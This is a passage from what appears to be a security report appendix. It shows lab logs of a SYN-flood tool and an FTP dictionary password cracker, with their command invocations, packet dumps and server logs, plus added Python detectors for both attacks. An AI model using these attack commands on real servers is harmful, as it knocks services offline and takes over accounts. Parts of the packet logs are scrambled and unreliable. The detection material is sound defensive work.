As in the connect scan, the server answers the SYN to port 21 with a RST packet, so port 21 is closed. On port 80 the server replies with SYN/ACK, but this time the hacker's host does not acknowledge it: it answers with a RST packet (last row), so the half-open connection is torn down and no complete connection is ever established on the target host. This is the difference between the SYN (half-open) scan and the connect scan.


A4.2.2. Fragments of logs for the program SYNflood.exe execution

The program SYNflood.exe is intended for generating a SYN flood (SF) attack (storm of inquiries on installation of TCP-connections).

Template for calling the program is as follows:

SYNflood.exe -s ip.ip.ip.ip -d ip.ip.ip.ip.port

where

ip.ip.ip.ip - source host address (as a rule it is a spoofed IP-address);
ip.ip.ip.ip.port - destination host address and port.

Let us assume that:

•  the malefactor's host spoofed IP-address is 192.168.131.131;

•  the malefactor's objective is that legal users cannot connect to the ftp server 192.168.130.135.21.

Therefore the malefactor starts SYNflood.exe with the following arguments:

SYNflood.exe -s 192.168.131.131 -d 192.168.130.135.21

The program sends TCP connection requests faster than the ftp-server can process them.

The fragment of log for the SYN flood attack:

09:37:13.031611  IP  192.168.131.131.1025  >  192.168.130.135.21:  S  14310:14310(0)  win  1024 
09:37:13.031702  IP  192.168.130.135.21  >  192.168.131.131.1025:  S  1535992950:1535992950(0)  ack  14311  win 
64240  <mss  1460>  (DF) 

09:37:13.032104  IP  192.168.131.131.1026  >  192.168.130.135.21:  S  58070:58070(0)  win  1024 
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09:37:13.032128  IP  192.168.130.135.21  >  192.168.131.131.1026: 
64240  <mss  1460>  (DF) 

09:37:13.032497  IP  192.168.131.131.1027  >  192.168.130.135.21: 
09:37:13.032521  IP  192.168.130.135.21  >  192.168.131.131.1027: 
64240  crass  1460>  (DF) 

09:37:13.032862  IP  192.168.131.131.1028  >  192.168.130.135.21: 
09:37:13.032883  IP  192.168.130.135.21  >  192.168.131.131.1028: 
win  64240  crass  1460>  (DF) 

09:37:13.033232  IP  192.168.131.131.1029  >  192.168.130.135.21: 
09:37:13.033254  IP  192.168.130.135.21  >  192.168.131.131.1029: 
win  64240  crass  1460>  (DF) 

09:37:13.033600  IP  192.168.131.131.1030  >  192.168.130.135.21: 
09:37:13.033626  IP  192.168.130.135.21  >  192.168.131.131.1030: 
09:37:13.033978  IP  192.168.131.131.1031  >  192.168.130.135.21: 
09:37:13.033994  IP  192.168.130.135.21  >  192.168.131.131.1031: 
09:37:13.034421  IP  192.168.131.131.1032  >  192.168.130.135.21: 
09:37:13.034438  IP  192.168.130.135.21  >  192.168.131.131.1032: 
09:37:13.034835  IP  192.168.131.131.1033  >  192.168.130.135.21: 
09:37:13.034851  IP  192.168.130.135.21  >  192.168.131.131.1033: 
09:37:13.035227  IP  192.168.131.131.1034  >  192.168.130.135.21: 
09:37:13.035248  IP  192.168.130.135.21  >  192.168.131.131.1034: 
09:37:13.035615  IP  192.168.131.131.1035  >  192.168.130.135.21: 
09:37:13.035631  IP  192.168.130.135.21  >  192.168.131.131.1035: 
09:37:13.036004  IP  192.168.131.131.1036  >  192.168.130.135.21: 
09:37:13.036020  IP  192.168.130.135.21  >  192.168.131.131.1036: 
09:37:13.036400  IP  192.168.131.131.1037  >  192.168.130.135.21: 
09:37:13.036417  IP  192.168.130.135.21  >  192.168.131.131.1037: 
09:37:13.036804  IP  192.168.131.131.1038  >  192.168.130.135.21: 
09:37:13.036820  IP  192.168.130.135.21  >  192.168.131.131.1038: 
09:37:13.037248  IP  192.168.131.131.1039  >  192.168.130.135.21: 
09:37:13.037273  IP  192.168.130.135.21  >  192.168.131.131.1039: 
09:37:13.037640  IP  192.168.131.131.1040  >  192.168.130.135.21: 
09:37:13.037683  IP  192.168.130.135.21  >  192.168.131.131.1040: 
09:37:13.038080  IP  192.168.131.131.1041  >  192.168.130.135.21: 
09:37:13.038104  IP  192.168.130.135.21  >  192.168.131.131.1041: 
09:37:13.038480  IP  192.168.131.131. 1042  >  192.168.130.135.21: 
09:37:13.038503  IP  192.168.130.135.21  >  192.168.131.131.1042: 
09:37:13.038875  IP  192.168.131.131.1043  >  192.168.130.135.21: 
09:37:13.038901  IP  192.168.130.135.21  >  192.168.131.131.1043: 
09:37:13.039273  IP  192.168.131.131.1044  >  192.168.130.135.21 : 
09:37:13.039295  IP  192.168.130.135.21  >  192.168.131.131.1044: 
09:37:13.039712  IP  192.168.131.131.1045  >  192.168.130.135.21: 
09:37:13.039756  IP  192.168.130.135.21  >  192.168.131.131.1045: 
09:37:13.040123  IP  192.168.131.131.1046  >  192.168.130.135.21 : 
09:37:13.040140  IP  192.168.130.135.21  >  192.168.131.131.1046: 
09:37:13.040525  IP  192.168.131.131.1047  >  192.168.130.135.21: 
09:37:13.040542  IP  192.168.130.135.21  >  192.168.131.131.1047: 
09:37:13.046819  IP  192.168.131.131.1048  >  192.168.130.135.21: 
09:37:13.046874  IP  192.168.130.135.21  >  192.168.131.131.1048: 
09:37:13.052612  IP  192.168.131.131.1049  >  192.168.130.135.21: 
09:37:13.052687  IP  192.168.130.135.21  >  192.168.131.131.1049: 
09:37:13.058403  IP  192.168.131.131.1050  >  192.168.130.135.21: 
09:37:13.058467  IP  192.168.130.135.21  >  192.168.131.131.1050: 

During  attack,  legal  users  cannot  connect  to  the  ftp  server: 


S  1536030444:1536030444(0)  ack  58071  win 

S  94370:94370(0)  win  1024 
S  1536070386:1536070386(0)  ack  94371  win 

S  112710:112710(0)  win  1024 
S  1536119311:1536119311(0)  ack  112711 

S  161650:161650(0)  win  1024 
S  1536154995:1536154995(0)  ack  161651 

S  130070:130070(0)  win  1024 
R  0:0(0)  ack  130071  win  0 
S  154205:154205(0)  win  1024 
R  0:0(0)  ack  154206  win  0 
S  41720:41720(0)  win  1024 
R  0:0(0)  ack  41721  win  0 
S  26365:26365(0)  win  1024 
R  0:0(0)  ack  26366  win  0 
S  10465:10465(0)  win  1024 
R  0:0(0)  ack  10466  win  0 
S  82685:82685(0)  win  1024 
R  0:0(0)  ack  82686  win  0 
S  30770:30770(0)  win  1024 
R  0:0(0)  ack  30771  win  0 
S  42270:42270(0)  win  1024 
R  0:0(0)  ack  42271  win  0 
S  127795:127795(0)  win  1024 
R  0:0(0)  ack  127796  win  0 
S  39745:39745(0)  win  1024 
R  0:0(0)  ack  39746  win  0 
S  96805:96805(0)  win  1024 
R  0:0(0)  ack  96806  win  0 
S  61045:61045(0)  win  1024 
R  0:0(0)  ack  61046  win  0 
S  154610:154610(0)  win  1024 
R  0:0(0)  ack  154611  win  0 
S  130010:130010(0)  win  1024 
R  0:0(0)  ack  130011  win  0 
S  19430:19430(0)  win  1024 
R  0:0(0)  ack  19431  win  0 
S  53685:53685(0)  win  1024 
R  0:0(0)  ack  53686  win  0 
S  36575:36575(0)  win  1024 
R  0:0(0)  ack  36576  win  0 
S  39490:39490(0)  win  1024 
R  0:0(0)  ack  39491  win  0 
S  123765:123765(0)  win  1024 
R  0:0(0)  ack  123766  win  0 
S  158210:158210(0)  win  1024 
R  0:0(0)  ack  158211  win  0 
S  33645:33645(0)  win  1024 
R  0:0(0)  ack  33646  win  0 
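The dump above shows the symptom a defender wants to catch: the server first completes handshakes (SYN-ACK replies), then answers new SYNs with RST, win 0, and from that point legitimate clients are refused. Below is an added Python example, not code from the report or from any tool it describes, that parses tcpdump summary lines in this format and raises two alerts: a per-source SYN-rate alert, and a backlog-exhaustion alert when a port that was answering SYN-ACK starts answering RST. The sample lines are constructed (addresses and ports modelled on the dump, sequence numbers made up).

```python
"""Flag SYN-flood symptoms in tcpdump summary lines (added example, not from the report)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# One summary line in the report's tcpdump format, e.g.
#   09:37:13.037640 IP 192.168.131.131.1040 > 192.168.130.135.21: S 94370:94370(0) win 1024
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{6})\s+IP\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+):\s+"
    r"(?P<flags>[SRPFU.]+)\s+(?P<rest>.*)$"
)


def parse_line(line):
    """Return the fields of one summary line, or None if the line is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    p = m.groupdict()
    p["ts"] = datetime.strptime(p["ts"], "%H:%M:%S.%f")
    p["sport"], p["dport"] = int(p["sport"]), int(p["dport"])
    p["syn"] = p["flags"] == "S" and "ack" not in p["rest"]     # bare SYN from a client
    p["synack"] = p["flags"] == "S" and "ack" in p["rest"]      # SYN-ACK from the server
    p["rst"] = "R" in p["flags"]
    return p


def analyse(lines, syn_threshold=10, window=timedelta(seconds=1)):
    """Return ({(server, port): {syn, synack, rst}}, [alert strings]).

    Two symptoms are reported: one source sending >= syn_threshold bare SYNs to
    one service inside `window`, and a service that answered some SYNs with
    SYN-ACK (so the port is open) but answered more of them with RST, which is
    what a full listen backlog looks like in the dump.
    """
    stats = defaultdict(lambda: {"syn": 0, "synack": 0, "rst": 0})
    recent = defaultdict(deque)   # (src, server, port) -> SYN timestamps inside the window
    pending = set()               # (client, cport, server, port) of unanswered SYNs
    flagged, alerts = set(), []
    for line in lines:
        p = parse_line(line)
        if p is None:
            continue
        if p["syn"]:
            service = (p["dst"], p["dport"])
            stats[service]["syn"] += 1
            pending.add((p["src"], p["sport"]) + service)
            key = (p["src"],) + service
            dq = recent[key]
            dq.append(p["ts"])
            while p["ts"] - dq[0] > window:
                dq.popleft()
            if len(dq) >= syn_threshold and key not in flagged:
                flagged.add(key)
                alerts.append(f"SYN rate: {p['src']} sent {len(dq)} SYNs to "
                              f"{p['dst']}:{p['dport']} within {window.total_seconds():g}s")
            continue
        conn = (p["dst"], p["dport"], p["src"], p["sport"])   # reply to a pending SYN?
        if conn in pending:
            pending.discard(conn)
            service = (p["src"], p["sport"])
            if p["synack"]:
                stats[service]["synack"] += 1
            elif p["rst"]:
                stats[service]["rst"] += 1
    for (host, port), s in stats.items():
        if s["synack"] and s["rst"] > s["synack"]:
            alerts.append(f"backlog exhaustion: {host}:{port} answered {s['synack']} SYNs "
                          f"with SYN-ACK but {s['rst']} with RST")
    return dict(stats), alerts


def sample_lines():
    """Constructed sample in the dump's format: three handshakes the server still
    accepts, then ten SYNs it rejects with RST (sequence numbers are made up)."""
    server, attacker = "192.168.130.135", "192.168.131.131"
    lines = []
    for i in range(13):
        ts = f"09:37:{13.037 + 0.0004 * i:09.6f}"
        cport, isn, sisn = 1039 + i, 50000 + 1000 * i, 7000 + i
        lines.append(f"{ts} IP {attacker}.{cport} > {server}.21: S {isn}:{isn}(0) win 1024")
        if i < 3:
            lines.append(f"{ts} IP {server}.21 > {attacker}.{cport}: S {sisn}:{sisn}(0) ack {isn + 1} win 64240")
        else:
            lines.append(f"{ts} IP {server}.21 > {attacker}.{cport}: R 0:0(0) ack {isn + 1} win 0")
    return lines


if __name__ == "__main__":
    for alert in analyse(sample_lines())[1]:
        print(alert)
```

The backlog rule deliberately requires at least one earlier SYN-ACK from the same port: a closed port also answers SYNs with RST, and without that condition a harmless probe of an unused port would look like exhaustion.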


The fragment of FTP-server's log: 

[5] Fri 18Mar03 09:37:13 - (024093) Connected to 192.168.131.131 (Local address 192.168.130.135)
[6] Fri 18Mar03 09:37:13 - (024093) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 18Mar03 09:37:13 - (024094) Connected to 192.168.131.131 (Local address 192.168.130.135)
[6] Fri 18Mar03 09:37:13 - (024094) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 18Mar03 09:37:13 - (024093) Closing connection
[5] Fri 18Mar03 09:37:13 - (024095) Connected to 192.168.131.131 (Local address 192.168.130.135)
[6] Fri 18Mar03 09:37:13 - (024095) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 18Mar03 09:37:13 - (024094) Closing connection
[5] Fri 18Mar03 09:37:13 - (024095) Closing connection
[5] Fri 18Mar03 09:37:13 - (024096) Connected to 192.168.131.131 (Local address 192.168.130.135)
[6] Fri 18Mar03 09:37:13 - (024096) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 18Mar03 09:37:13 - (024097) Connected to 192.168.131.131 (Local address 192.168.130.135)
[6] Fri 18Mar03 09:37:13 - (024097) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 18Mar03 09:37:13 - (024096) Closing connection
[5] Fri 18Mar03 09:37:13 - (024097) Closing connection


A4.2.3.  Fragments  of  logs  for  program  ftpcrack.exe  execution 


The program ftpcrack.exe is intended for Password Cracking (PC) attack generation. 
The template for calling the program is as follows: 

ftpcrack.exe -d ip.ip.ip.ip.host -u username -f filename 

where 

ip.ip.ip.ip.host - destination host address and port (with the FTP server); 

username - the user's login name; 

filename - the name of the file with the dictionary of passwords. 


Let us assume that: 

•  the malefactor's target host is an FTP server having IP address 192.168.130.136; 

•  the malefactor knows that the FTP server has a user with login name "eman"; 

•  the malefactor possesses the file passwords.txt with the list of "standard" passwords: 

A&M 

A&P 

AAA 

AAAS 

elysian 

em 

emaciate 

emacs 

eman  <-  this  is  a  real  password  of  the  user  “eman” 

emanate 

emancipate 

emasculate 

embalm 


zooplankton 

zounds 

zucchini 

zygote 


Therefore the malefactor starts this program with the following arguments: 

ftpcrack.exe -d 192.168.130.135.21 -u eman -f passwords.txt 

The fragment of the client host log: 

Starting  ftpcrack  v.1.0 
Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 
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Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  A&M 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  A&P 
Reply:  530  Not  logged  in. 

Bad  password! 


Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  emaciate 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  emacs 
Reply:  530  Not  logged  in. 

Bad  password! 

Connecting... 

Send:  connecting  to  192.168.130.135.21 

Reply:  220  Serv-U  FTP  Server  v4.1  for  WinSock  ready... 

Send:  USER  eman 

Reply:  331  User  name  okay,  need  password. 

Send:  PASS  eman 

Reply:  230  User  logged  in,  proceed. 

SUCCESS!  Use  this  account  and  password  for  access  to  ftp-server: 
USERNAME:  eman 
PASSWD:  eman 


The  fragment  of  FTP-server's  log: 

[5] Fri 07Mar03 11:42:25 - (024044) Connected to 192.168.130.136 (Local address 192.168.130.135)
[6] Fri 07Mar03 11:42:25 - (024044) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 07Mar03 11:42:25 - (024044) IP-Name: HACKER
[2] Fri 07Mar03 11:42:25 - (024044) USER eman
[6] Fri 07Mar03 11:42:25 - (024044) 331 User name okay, need password.
[2] Fri 07Mar03 11:42:25 - (024044) PASS xxxxx
[6] Fri 07Mar03 11:42:25 - (024044) 530 Not logged in.
[5] Fri 07Mar03 11:42:25 - (024044) Closing connection

[5] Fri 07Mar03 11:42:25 - (024045) Connected to 192.168.130.136 (Local address 192.168.130.135)
[6] Fri 07Mar03 11:42:25 - (024045) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 07Mar03 11:42:25 - (024045) IP-Name: HACKER
[2] Fri 07Mar03 11:42:25 - (024045) USER eman
[6] Fri 07Mar03 11:42:25 - (024045) 331 User name okay, need password.
[2] Fri 07Mar03 11:42:25 - (024045) PASS xxxxx
[6] Fri 07Mar03 11:42:25 - (024045) 530 Not logged in.
[5] Fri 07Mar03 11:42:25 - (024045) Closing connection

[5] Fri 07Mar03 11:42:25 - (024046) Connected to 192.168.130.136 (Local address 192.168.130.135)
[6] Fri 07Mar03 11:42:25 - (024046) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 07Mar03 11:42:25 - (024046) IP-Name: HACKER
[2] Fri 07Mar03 11:42:25 - (024046) USER eman
[6] Fri 07Mar03 11:42:25 - (024046) 331 User name okay, need password.
[2] Fri 07Mar03 11:42:25 - (024046) PASS xxxxx
[6] Fri 07Mar03 11:42:25 - (024046) 530 Not logged in.
[5] Fri 07Mar03 11:42:25 - (024046) Closing connection

[5] Fri 07Mar03 11:42:25 - (024047) Connected to 192.168.130.136 (Local address 192.168.130.135)
[6] Fri 07Mar03 11:42:25 - (024047) 220 Serv-U FTP Server v4.1 for WinSock ready...
[5] Fri 07Mar03 11:42:25 - (024047) IP-Name: HACKER
[2] Fri 07Mar03 11:42:25 - (024047) USER eman
[6] Fri 07Mar03 11:42:25 - (024047) 331 User name okay, need password.
[2] Fri 07Mar03 11:42:25 - (024047) PASS xxxxx
[5] Fri 07Mar03 11:42:25 - (024047) User EMAN logged in
[6] Fri 07Mar03 11:42:25 - (024047) 230 User logged in, proceed.
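The Serv-U log above is what a defender has to work with on the server side: one session per password attempt, each ending in a 530 reply, until the final 230. The following Python example, added here and not part of the report or of Serv-U, parses log lines in this format, tracks the source address and user name per session id, and alerts both on repeated 530 failures for one (source, user) pair inside a time window and on a 230 success that follows such a run, which is the event worth escalating because the guessed password worked. The sample log lines are constructed to mirror the format above (the IP-Name line is left out; the detector does not need it).

```python
"""Detect password guessing in Serv-U style FTP logs (added example, not from the report)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One log line in the format of the server log above, e.g.
#   [6] Fri 07Mar03 11:42:25 - (024046) 530 Not logged in.
LOG_RE = re.compile(
    r"^\[(?P<lvl>\d)\]\s+\w{3}\s+(?P<date>\d{2}\w{3}\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2})"
    r"\s+-\s+\((?P<sid>\d+)\)\s+(?P<msg>.*)$"
)
CONNECT_RE = re.compile(r"^Connected to (\d+\.\d+\.\d+\.\d+)")
USER_RE = re.compile(r"^USER (\S+)")


def parse_line(line):
    """Return level, timestamp, session id and message of one log line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    p = m.groupdict()
    p["ts"] = datetime.strptime(p["date"] + " " + p["time"], "%d%b%y %H:%M:%S")
    return p


def detect(lines, max_failures=3, window=timedelta(minutes=5)):
    """Return alerts as (kind, source_ip, user, failure_count) tuples.

    'brute-force' fires once when a (source, user) pair reaches max_failures 530
    replies inside `window`; 'success-after-failures' fires when a 230 follows
    such a run, i.e. a guessed password worked and the account should be treated
    as compromised.
    """
    sessions = {}                 # session id -> {"ip": ..., "user": ...}
    failures = defaultdict(list)  # (ip, user) -> timestamps of 530 replies in the window
    flagged, alerts = set(), []
    for line in lines:
        p = parse_line(line)
        if p is None:
            continue
        s = sessions.setdefault(p["sid"], {"ip": None, "user": None})
        msg, ts = p["msg"], p["ts"]
        if (m := CONNECT_RE.match(msg)):
            s["ip"] = m.group(1)
        elif (m := USER_RE.match(msg)):
            s["user"] = m.group(1)
        elif msg.startswith("530 ") or msg.startswith("230 "):
            key = (s["ip"], s["user"])
            recent = [t for t in failures[key] if ts - t <= window]
            if msg.startswith("530 "):
                recent.append(ts)
                if len(recent) >= max_failures and key not in flagged:
                    flagged.add(key)
                    alerts.append(("brute-force", key[0], key[1], len(recent)))
            elif len(recent) >= max_failures:
                alerts.append(("success-after-failures", key[0], key[1], len(recent)))
            failures[key] = recent
    return alerts


def sample_log():
    """Constructed lines mirroring the server log above: five sessions from one host
    for user 'eman', four ending in 530 and the fifth in 230."""
    attacker, server = "192.168.130.136", "192.168.130.135"
    lines = []
    for i in range(5):
        stamp = f"Fri 07Mar03 11:42:{25 + i:02d} - ({24044 + i:06d})"
        result = "530 Not logged in." if i < 4 else "230 User logged in, proceed."
        lines += [
            f"[5] {stamp} Connected to {attacker} (Local address {server})",
            f"[6] {stamp} 220 Serv-U FTP Server v4.1 for WinSock ready...",
            f"[2] {stamp} USER eman",
            f"[6] {stamp} 331 User name okay, need password.",
            f"[2] {stamp} PASS xxxxx",
            f"[6] {stamp} {result}",
            f"[5] {stamp} Closing connection",
        ]
    return lines


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Keying the counters on (source, user) rather than on the session id is what makes this work against the tool's behaviour in the log: every attempt opens a fresh session with a new id, so per-session counting would never exceed one failure.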

The  fragment  of  the  log  of  ftpcrack.exe  network  packets: 

11:42:25.153230 IP 192.168.130.136.2367 > 192.168.130.135.21: S 4164059962:4164059962(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 87ea 4000 8006 5ebd 0a00 0015 E..0..@...A
0x0010 0a00 000c 093f 0015 f832 833a 0000 0000 .?...2.:..
0x0020 7002 faf0 ef4c 0000 0204 05b4 0101 0402 p....L.

11:42:25.153317 IP 192.168.130.135.21 > 192.168.130.136.2367: S 1864989020:1864989020(0) ack 4164059963 win 64240 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 6ea2 4000 c806 3005 0a00 000c E..0n.@...0.
0x0010 0a00 0015 0015 093f 6f29 795c f832 833b .?o)y\.2.;
0x0020 7012 faf0 06b6 0000 0204 05b4 0101 0402 p.

11:42:25.153467 IP 192.168.130.136.2367 > 192.168.130.135.21: . ack 1 win 64240 (DF)
0x0000 4500 0028 87eb 4000 8006 5ec4 0a00 0015 E..(..@...A.
0x0010 0a00 000c 093f 0015 f832 833b 6f29 795d .?...2.;o)y]
0x0020 5010 faf0 337a 0000 0204 05b4 0101 P...3z.

11:42:25.164874 IP 192.168.130.135.21 > 192.168.130.136.2367: P 1:50(49) ack 1 win 64240 (DF)
0x0000 4500 0059 6ea3 4000 c806 2fdb 0a00 000c E..Yn.@.../.
0x0010 0a00 0015 0015 093f 6f29 795d f832 833b .?o)y].2.;
0x0020 5018 faf0 3575 0000 3232 3020 5365 7276 P...5u..220.Serv
0x0030 2d55 2046 5450 2053 6572 7665 7220 7634 -U.FTP.Server.v4
0x0040 2e31 2066 6f72 2057 696e 536f 636b 2072 .1.for.WinSock.r
0x0050 6561 ea

11:42:25.167699 IP 192.168.130.136.2367 > 192.168.130.135.21: P 1:13(12) ack 50 win 64191 (DF)
0x0000 4500 0034 87ec 4000 8006 5eb7 0a00 0015 E..4..@...A.
0x0010 0a00 000c 093f 0015 f832 833b 6f29 798e .?...2.;o)y.
0x0020 5018 fabf 8fcf 0000 5553 4552 2065 6d61 P.......USER.ema
0x0030 6e20 0d0a n...

11:42:25.175986 IP 192.168.130.135.21 > 192.168.130.136.2367: P 50:86(36) ack 13 win 64228 (DF)
0x0000 4500 004c 6ea4 4000 c806 2fe7 0a00 000c E..Ln.@.../.
0x0010 0a00 0015 0015 093f 6f29 798e f832 8347 .?o)y..2.G
0x0020 5018 fae4 8613 0000 3333 3120 5573 6572 P.......331.User
0x0030 206e 616d 6520 6f6b 6179 2c20 6e65 6564 .name.okay,.need
0x0040 2070 6173 7377 6f72 642e 0d0a .password...

11:42:25.178484 IP 192.168.130.136.2367 > 192.168.130.135.21: P 13:24(11) ack 86 win 64155 (DF)
0x0000 4500 0033 87ed 4000 8006 5eb7 0a00 0015 E..3..@...A.
0x0010 0a00 000c 093f 0015 f832 8347 6f29 79b2 .?...2.Go)y.
0x0020 5018 fa9b 1f2b 0000 5041 5353 2041 264d P....+..PASS.A&M
0x0030 200d 0a

11:42:25.187847 IP 192.168.130.135.21 > 192.168.130.136.2367: P 86:106(20) ack 24 win 64217 (DF)
0x0000 4500 003c 6ea5 4000 c806 2ff6 0a00 000c E..<n.@.../.
0x0010 0a00 0015 0015 093f 6f29 79b2 f832 8352 .?o)y..2.R
0x0020 5018 fad9 3649 0000 3533 3020 4e6f 7420 P...6I..530.Not.
0x0030 6c6f 6767 6564 2069 6e2e 0d0a logged.in...

11:42:30.033413 IP 192.168.130.136.2434 > 192.168.130.135.21: S 4168608977:4168608977(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 89af 4000 8006 5cf8 0a00 0015 E..0..@...\.
0x0010 0a00 000c 0982 0015 f877 ecd1 0000 0000 .w.
0x0020 7002 faf0 852d 0000 0204 05b4 0101 0402 p....-.

11:42:30.033459 IP 192.168.130.135.21 > 192.168.130.136.2434: S 1869526539:1869526539(0) ack 4168608978 win 64240 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 706f 4000 c806 2e38 0a00 000c E..0po@....8....
0x0010 0a00 0015 0015 0982 6f6e b60b f877 ecd2 .on...w..
0x0020 7012 faf0 5fa2 0000 0204 05b4 0101 0402 p..._.

11:42:30.033608 IP 192.168.130.136.2434 > 192.168.130.135.21: . ack 1 win 64240 (DF)
0x0000 4500 0028 89b0 4000 8006 5cff 0a00 0015 E..(..@...\.
0x0010 0a00 000c 0982 0015 f877 ecd2 6f6e b60c .w..on..
0x0020 5010 faf0 8c66 0000 0204 05b4 0101 P....f.

11:42:30.043183 IP 192.168.130.135.21 > 192.168.130.136.2434: P 1:50(49) ack 1 win 64240 (DF)
0x0000 4500 0059 7070 4000 c806 2e0e 0a00 000c E..Ypp@.
0x0010 0a00 0015 0015 0982 6f6e b60c f877 ecd2 .on...w..
0x0020 5018 faf0 8e61 0000 3232 3020 5365 7276 P....a..220.Serv
0x0030 2d55 2046 5450 2053 6572 7665 7220 7634 -U.FTP.Server.v4
0x0040 2e31 2066 6f72 2057 696e 536f 636b 2072 .1.for.WinSock.r
0x0050 6561 ea

11:42:30.053300 IP 192.168.130.136.2434 > 192.168.130.135.21: P 1:13(12) ack 50 win 64191 (DF)
0x0000 4500 0034 89b1 4000 8006 5cf2 0a00 0015 E..4..@...\.
0x0010 0a00 000c 0982 0015 f877 ecd2 6f6e b63d .w..on.=
0x0020 5018 fabf e8bb 0000 5553 4552 2065 6d61 P.......USER.ema
0x0030 6e20 0d0a n...

11:42:30.061772 IP 192.168.130.135.21 > 192.168.130.136.2434: P 50:86(36) ack 13 win 64228 (DF)
0x0000 4500 004c 7071 4000 c806 2e1a 0a00 000c E..Lpq@.
0x0010 0a00 0015 0015 0982 6f6e b63d f877 ecde .on.=.w..
0x0020 5018 fae4 deff 0000 3333 3120 5573 6572 P.......331.User
0x0030 206e 616d 6520 6f6b 6179 2c20 6e65 6564 .name.okay,.need
0x0040 2070 6173 7377 6f72 642e 0d0a .password...

11:42:30.071091 IP 192.168.130.136.2434 > 192.168.130.135.21: P 13:25(12) ack 86 win 64155 (DF)
0x0000 4500 0034 89b2 4000 8006 5cf1 0a00 0015 E..4..@...\.
0x0010 0a00 000c 0982 0015 f877 ecde 6f6e b661 .w..on.a
0x0020 5018 fa9b dfc0 0000 5041 5353 2065 6d61 P.......PASS.ema
0x0030 6e20 0d0a n...

11:42:30.090595 IP 192.168.130.135.21 > 192.168.130.136.2434: P 86:116(30) ack 25 win 64216 (DF)
0x0000 4500 0046 7073 4000 c806 2e1e 0a00 000c E..Fps@.
0x0010 0a00 0015 0015 0982 6f6e b661 f877 ecea .on.a.w..
0x0020 5018 fad8 c756 0000 3233 3020 5573 6572 P....V..230.User
0x0030 206c 6f67 6765 6420 696e 2c20 7072 6f63 .logged.in,.proc
0x0040 6565 642e 0d0a eed...
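The summary lines name the endpoints, but the hex column is the authoritative evidence: it carries the IP and TCP headers and the FTP control-channel text in the clear. The Python example below, added here and not taken from the report, converts tcpdump hex lines back into bytes, decodes the IPv4 and TCP headers, verifies both header checksums, and extracts the FTP command from the payload with the PASS argument redacted so that decoded evidence does not itself leak the credential. The sample is the `USER eman` packet of the second session above with the OCR letter/digit confusions corrected (`OaOO` read as `0a00`). Decoding it shows that the addresses in the hex are 10.0.0.21 and 10.0.0.12 rather than the 192.168.130.x addresses printed in the summary lines, and both checksums verify against the hex, so when the two columns disagree the hex is the one to trust.

```python
"""Decode tcpdump hex lines into IPv4/TCP fields (added example, not from the report)."""
import re
import struct

# The 'USER eman' packet of the second ftpcrack session in the report's dump,
# with the OCR letter/digit confusions corrected ('OaOO' -> '0a00').
SAMPLE_DUMP = r"""
0x0000  4500 0034 89b1 4000 8006 5cf2 0a00 0015  E..4..@...\.....
0x0010  0a00 000c 0982 0015 f877 ecd2 6f6e b63d  .........w..on.=
0x0020  5018 fabf e8bb 0000 5553 4552 2065 6d61  P.......USER.ema
0x0030  6e20 0d0a                                n...
"""

TCP_FLAGS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG"))


def hexdump_to_bytes(text):
    """Turn '0x0010  0a00 0015 ...  ascii' lines into bytes; the ASCII column is ignored.
    At most eight 4-hex groups (16 bytes) per line; a 2-hex group ends an odd-length dump."""
    out = bytearray()
    for line in text.splitlines():
        tok = line.split()
        if not tok or not tok[0].startswith("0x"):
            continue
        if int(tok[0], 16) != len(out):
            raise ValueError(f"offset {tok[0]} does not match the {len(out)} bytes read so far")
        groups = []
        for t in tok[1:]:
            if len(groups) < 8 and re.fullmatch(r"[0-9a-f]{4}", t):
                groups.append(t)
            elif len(groups) < 8 and re.fullmatch(r"[0-9a-f]{2}", t):
                groups.append(t)
                break                      # odd trailing byte ends the data
            else:
                break                      # ASCII column reached
        out += bytes.fromhex("".join(groups))
    return bytes(out)


def inet_checksum(data):
    """RFC 1071 one's-complement checksum; returns 0 when a stored checksum verifies."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_ipv4_tcp(pkt):
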